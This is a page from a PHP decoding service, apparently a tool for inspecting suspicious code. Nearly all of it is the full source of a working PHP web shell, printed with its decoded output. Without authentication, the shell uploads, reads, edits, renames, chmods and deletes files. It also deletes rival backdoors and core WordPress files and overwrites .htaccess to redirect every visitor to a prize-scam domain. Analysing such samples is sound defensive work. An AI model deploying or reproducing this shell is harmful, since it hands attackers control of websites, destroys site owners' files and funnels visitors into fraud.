Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @session_start(); @set_time_limit(0); $sikadata=array(); $sikahttpd=array(); $s..

Decoded Output download

<!DOCTYPE HTML> 
<HTML> 
<HEAD> 
<title></title> 
<style> 
body{ 
font-family: monospace; 
font-weight: bold; 
font-size: 18px; 
background-color: #c5c5c5; 
color: #000; 
} 
.targeted{ 
     
} 
.boldTarget{ 
	font-weight: 900; 
    background-color: #b5b5b58a; 
    display: block; 
    padding: 5px 10px; 
} 
#content tr:hover{ 
background-color: #ccc; 
} 
#content .first{ 
background-color: #ccc; 
} 
#content .first:hover{ 
background-color: #ccc; 
} 
table{ 
border: 3px #000 solid; 
} 
a{ 
color: #000; 
text-decoration: none; 
} 
a:hover{ 
color: #00f; 
} 
input,select,textarea{ 
border: 1px #000 solid; 
-moz-border-radius: 5px; 
-webkit-border-radius:5px; 
border-radius:5px; 
} 
input { 
 font-size: 18px; 
 font-weight: bold; 
 padding: 5px; 
} 
select { 
font-size: 19px 
} 
textarea { 
font-size: 10px 
} 
td, tr { padding: 2px 5px; } 
 
</style> 
</HEAD> 
<BODY> 
<hr width="920" color="black"/> 
<hr width="920" color="black"/><center><p><h2>Your IP : None</h2></p></center> 
<hr width="920" color="black"/> 
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center"> 
<tr><td style="padding: 8px">Current Path : 

Did this file decode correctly?

Original Code

<?php
@session_start();
@set_time_limit(0);
$sikadata=array();
$sikahttpd=array();
$sikawplogin=array();
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
.targeted{
    
}
.boldTarget{
	font-weight: 900;
    background-color: #b5b5b58a;
    display: block;
    padding: 5px 10px;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : ';

if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">Upload Success..</font><br />';
}else{
echo '<font color="red">Upload Gagal..</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td style='padding: 8px'>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Chmod Success..</font><br />';
}else{
echo '<font color="red">Chmod Gagal..</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Rename Berhasil..</font><br />';
}else{
echo '<font color="red">Rename Gagal..</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Berhasil..</font><br />';
}else{
echo '<font color="red">Edit File Gagal..</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Directory Berhasil..</font><br />';
}else{
echo '<font color="red">Delete Directory Gagal..</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Berhasil..</font><br />';
}else{
echo '<font color="red">Delete File Gagal..</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
$sbdirs=scandir($dir);
$ccclass="";
if(in_array(".htaccess",$sbdirs)){
    $ccclass="targeted";
    $file_content = file_get_contents("$path/$dir/.htaccess");
    $trg="RewriteRule ^([A-Za-z0-9-]+).html";
    if(strpos($file_content, $trg) !== false ){
        $ccclass.=" boldTarget";
        $tmp = $file_content;
        $tmp = strstr($tmp, "$"); //gets all text from needle on
        $tmp = strstr($tmp, ".php", true); //gets all text before needle
        $tmp=ltrim(substr($tmp, 1));
        //$GLOBALS['sikadata'][]="$path/$dir/$tmp.php";
        $GLOBALS['sikadata'][]="$path/$dir/";
		$GLOBALS['sikahttpd'][]="$path/$dir/httpd";
        $GLOBALS['sikawplogin'][]="$path/$dir/wp-login.php";
    }
} 
echo "<tr>
<td><a class=\"".$ccclass."\" href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="Blue">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="Blue">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
	
		foreach($sikadata as $tgt) {
            try {
				$target1 = $tgt."httpd";
				$target2 = $tgt."wp-login.php";
				$target3 = $tgt."index.php";
				$target4 = $tgt.".htaccess";
				
				if (file_exists($target4)) {
					unlink($target4);
				}
				if (file_exists($target3)) {
					unlink($target3);
				}
				if (file_exists($target1)) {
					unlink($target1);
				}
				if (file_exists($target2)) {
					unlink($target2);
				}
				
            } catch (\Throwable $th) {
            }
		}
	
$htac = 'RedirectPermanent / https://take-bestprize.life/?u=fn7nu1c&o=m0gpe9l&t=';

if (file_exists(".htaccess")) {
	unlink(".htaccess");
}
$fp = fopen(".htaccess", 'x');
fwrite($fp,$htac);
fclose($fp);


if (file_exists("index.php")) {
	unlink("index.php");
}
if (file_exists("wp-load.php")) {
	unlink("wp-load.php");
}
if (file_exists("wp-admin.php")) {
	unlink("wp-admin.php");
}
if (file_exists("admin.php")) {
	unlink("admin.php");
}
if (file_exists("1index.php")) {
	unlink("1index.php");
}
if (file_exists("2index.php")) {
	unlink("2index.php");
}
if (file_exists("wp-22.php")) {
	unlink("wp-22.php");
}
if (file_exists("votes.php")) {
	unlink("votes.php");
}




echo 'Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! 

</BODY>
</HTML>';

function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
?>

Function Calls

getcwd 1
session_start 1
set_time_limit 1

Variables

$sikadata []
$sikahttpd []
$sikawplogin []

Stats

MD5 719a6c8c244b80321a755de861631499
Eval Count 0
Decode Time 208 ms